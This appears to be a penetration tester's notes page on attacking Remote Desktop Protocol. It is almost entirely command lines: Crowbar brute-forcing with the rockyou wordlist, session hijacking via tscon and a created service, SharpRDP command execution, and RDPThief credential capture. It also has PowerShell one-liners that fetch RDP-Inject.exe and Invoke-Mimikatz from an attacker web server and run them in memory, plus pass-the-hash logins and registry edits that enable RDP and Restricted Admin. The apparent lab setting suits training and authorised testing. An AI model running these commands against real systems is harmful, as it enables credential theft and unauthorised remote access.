Edit

Pentesting RDP

CROWBAR

  • Remote desktop protocol with Crowbar

    • Crowbar is a network authentication cracking tool

sudo apt install crowbar

  • Make a suitable wordlist

  • Attempt to bruteforce RDP

crowbar -b rdp -s $host/32 -u admin -C /usr/share/wordlist/rockyou.txt -n 1 -v 
# -b protocol # -s target server 
# -n number of threads (RDP doesnt reliably handle multiple threads)

  • If errors are encountered like: File Not Found, convert the wordlist to UTF-8

iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt

RDP Session Hijacking

  • Must have SYSTEM privs

query user

  • https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tscon 

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} 
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" 
net start sessionhijack

SHARP RDP

SharpRDP.exe computername=appsrv01 command="powershell -c IEX" username=corp\dave password=lab

RDP Thief

  • rdpthief.dll must be on the local machine

  • Modify C# source with the location of the hidden RDPThief.dll on disk

  • C# RDP-Inject.exe runs in a while loop and injects into each RDP process in order to capture credentials from RDP

  • Dump captured credentials 

type C:\Users\User\AppData\Local\Temp\3\data.bin
$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $data = $wc.DownloadData('http://192.168.49.124/RDP-Inject.exe');$assem = [System.Reflection.Assembly]::Load($data);$entryPointMethod = $assem.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))

  • The above command pulls RDP-Thief from a remote webserver and loads it via powershell reflection. Ensure you update the arguments in the above command

Screenshot the Desktop

  • You can take a screenshot of the desktop if NLA is disabled

  • with netexec

--nla-screenshot
--screenshot
--screentime SCREENTIME

  • Resolution with WxH Default 1024x768

--res RES

Enable RDP via Crackmapexec

crackmapexec smb 10.129.203.121 -u julio -p Password1 -M rdp --options 
crackmapexec smb 10.129.203.121 -u julio -p Password1 -M rdp -o ACTION=enable

Enable RDP via Registry

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall add rule name=3389 protocol=TCP dir=in localip=any localport=3389 action=allow

Enable RDP access for user

net localgroup "Remote Desktop Users" joe /add
Add-LocalGroupMember -Group 'Remote Desktop Users' -Member robert.lanza 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member john' 
powershell -c 'Add-LocalGroupMember -Group "Remote Desktop Users" -Member alice'

Remove Remote Desktop Access for user

Remove-LocalGroupMember -Group "Remote Desktop Users" -Member robert.lanza

If PTH is Disabled

  • Enable Restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

RDesktop

RDESKTOP

rdesktop 10.11.1.13 -u xxx -p xxx rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!'

  • Mount folders using RDesktop

rdesktop 10.129.131.50 -u htb-student -p 'HTB_@cademy_stdnt!' -r disk:linux='~/tools'

XFreeRDP

xfreerdp /v:$host /u:administrator /cert:ignore xfreerdp /v:10.11.1.31 /u:sa /p:poiuytrewq /cert:ignore

  • All security certificates should be ignored 

xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
xfreerdp /v:10.11.1.247 /port:1234 /u:brett /p:ilovesecuritytoo

  • Mount a folder on our attacker machine to the target machine

mkdir /tmp/filetransfer
xfreerdp /v:10.129.131.50 /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:~/tools
# ERROR: If you encounter the below error add the below switch
`[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED`
/tls-seclevel:0

  • Some other xfreerdp commands with options that have been helpful in the past

xfreerdp /v:manageengine /u:Administrator /p:studentlab /cert:ignore /tls-seclevel:0 /timeout:80000 /size:1920x1010 /scale:50
xfreerdp /u:blwasp /p:'Password123!' /v:10.129.230.38 /dynamic-resolution /drive:.,linux /bpp:8 /compression -themes -wallpaper /clipboard /audio-mode:0 /auto-reconnect -glyph-cache

Pass The Hash RDP

xfreerdp /u:domain\username /pth: /v:$host

  • If PTH is disabled, enable restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

PTH RDP From a Windows machine

sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:"mstsc.exe /restrictedadmin"

$wc = New-Object System.Net.WebClient; $wc.Headers['User-Agent'] = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; $wc.DownloadString('http://192.168.49.120/Invoke-Mimikatz.ps1') | IEX
Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:corp1 /ntlm: /run:mstsc.exe /restrictedadmin"'

Nmap

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

RDP Security Check

sudo cpan 
install Encoding::BER 
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check 
./rdp-sec-check.pl $host
PreviousVulnerability ScanningNextresources

Last updated